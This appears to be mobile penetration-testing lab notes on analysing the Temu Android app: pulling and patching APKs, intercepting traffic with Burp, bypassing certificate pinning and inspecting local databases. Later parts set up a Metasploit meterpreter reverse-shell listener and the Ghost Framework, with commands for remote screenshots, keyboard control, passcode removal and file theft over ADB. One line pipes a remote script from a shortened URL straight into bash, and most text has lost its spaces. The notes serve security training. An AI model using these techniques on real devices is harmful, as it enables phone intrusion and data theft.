Install Temu app via Android Play Store - name com.einnovation.temu
frida-ps-Uai|greptemuTemucom.einnovation.temu
Pull apk from the phone
cd~/tcm/mapt/temuadbshellpmlistpackages|greptemuadbshellpmpathcom.einnovation.temuadbpull/data/app/com.einnovation.temu-RKERNRo1SuGOM3UEbNeFIA==/base.apkadbpull/data/app/com.einnovation.temu-RKERNRo1SuGOM3UEbNeFIA==/split_config.arm64_v8a.apkadbpull/data/app/com.einnovation.temu-RKERNRo1SuGOM3UEbNeFIA==/split_config.xhdpi.apk.rw-r--r--19Mbase.apk.rw-r--r--15Msplit_config.arm64_v8a.apk.rw-r--r--77ksplit_config.xhdpi.apkmvbase.apktemu.apk# or use apkpull tool by david-leecurl-sLbit.ly/apkpull|bash-s--com.einnovation.temu-d.
Check strings.xml for hardcoded strings, databases (Firebase, etc), keys, email, phone numbers, etc.
Setup BurpSuite with Proxy listener to All interfaces and set the proxy on the device network connection (make sure BurpSuite certificate is installed)
# Create an alias for set and unset proxyalias adbsetproxy="adb shell settings put global http_proxy $(ip-o-4addrshoweth1|awk '{print $4}' |sed 's/\/.*//g'):8080"alias adbunsetproxy="adb shell settings put global http_proxy :0"# Use the created alias to set the proxyadbsetproxy
Navigate the app. It seems certificate pinning is on.
Certificate Pinning bypassed successfully. Traffic is intercepted in BurpSuite.
Navigate the app and check the HTTP history requests.
In Jadx-GUI search for URLs (http, https), API_KEY, Coupons, etc
Check internal storage for sensitive data store in files, cache, databases, etc
adbshellsucd/data/data/com.einnovation.temu/# or open Device Explorer in Android Studio
Check for databases
After navigating and interacting with the app, Pull interesting db files and check them with SQLite Browser, look through the database tables and structure.
# e.g.adbpull/data/data/com.einnovation.temu/databases/google_app_measurement_local.db# if Permission Denied error use su command like thisadb-dshell"su -c cp /data/data/com.einnovation.temu/databases/google_app_measurement_local.db /sdcard/Download"adbpull/sdcard/Download/google_app_measurement_local.dbsqlitebrowsergoogle_app_measurement_local.db
Interaction with all the app's functions is important to further analyze the app during dynamic analysis.
Patching APK
patch-apk tool can also be used for identifying the package name, extracting APKs, patching with objection, consolidating split APKs, enabling CA certificates, uninstalling the original app, and installing the patched version.
# Usagecd~/repogitclonehttps://github.com/NickstaDB/patch-apk.gitcd~/repo/patch-apkapktoolempty-framework-dir--forcepython3patch-apk.pycom.einnovation.temu# In case of apktool errormv~/.local/share/apktool/framework/1.apk~/.local/share/apktool/framework/1.apk.bak# Get a proper framework apk from a device /system/frameworkadbpull/system/framework/framework-res.apkmvframework-res.apk~/.local/share/apktool/framework/1.apk# Re-run patck-apkpython3patch-apk.pycom.einnovation.temu
# Create a Keystorekeytool-genkey-v-keystoredemo.keystore-aliasdemokeys-keyalgRSA-keysize2048-validity10000# Sign the APKjarsigner-sigalgSHA1withRSA-digestalgSHA1-keystoredemo.keystore-storepassdemopwandroid.apkdemokeys# zipalign the APKzipalign-v4android.apkandroid_signed.apk
adbinstallandroid_signed.apk# or via network (to device or emulator)# adb -H 192.168.56.103 -P 5555 install android_signed.apk
Open a meterpreter shell and listen for the connection
msfconsoleuseexploit/multi/handler# set LHOST and LPORT same as in the msfvenom commandsetLHOST<LOCAL_HOST_IP>setLPORT<LOCAL_PORT>run
🔗 kp-forks/ghost-1 - Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration
cd~/repogitclonehttps://github.com/kp-forks/ghost-1.gitcdghost-1sudo./install.sh# Run withsudo./ghost
To make it work on port 5555, adb should be connected via tcp to the device
# Connect device with USBadbtcpip5555adbconnect<DEVICE_IP>:5555adbdevices# Disconnet device USB
# Similar to MetasploitsetRHOST<DEVICE_IP>optionsrun
# Some Ghost commandsCoreCommands=============CommandDescription------------------clearClearterminalwindow.execExecutelocalsystemcommand.exitExitandclosecurrentsession.helpShowavailablesessioncommands.SettingsCommands=================CommandDescription------------------activityGetdeviceactivityinformation.batteryGetdevicebatteryinformation.netstatGetdevicenetworkinformation.sysinfoGetdevicesysteminformation.wifiControldevicewifiservice.ManagingCommands=================CommandDescription------------------eatpassEatdevicepasscode.keyboardControltargetkeyboard.openurlOpenURLondevice.screenControldevicescreen.screenshotTakedevicescreenshot.shellOpendeviceshell.uploadUploadlocalfile.StealingCommands=================CommandDescription------------------downloadDownloadremotefile.BootCommands=============CommandDescription------------------rebootRebootdevice.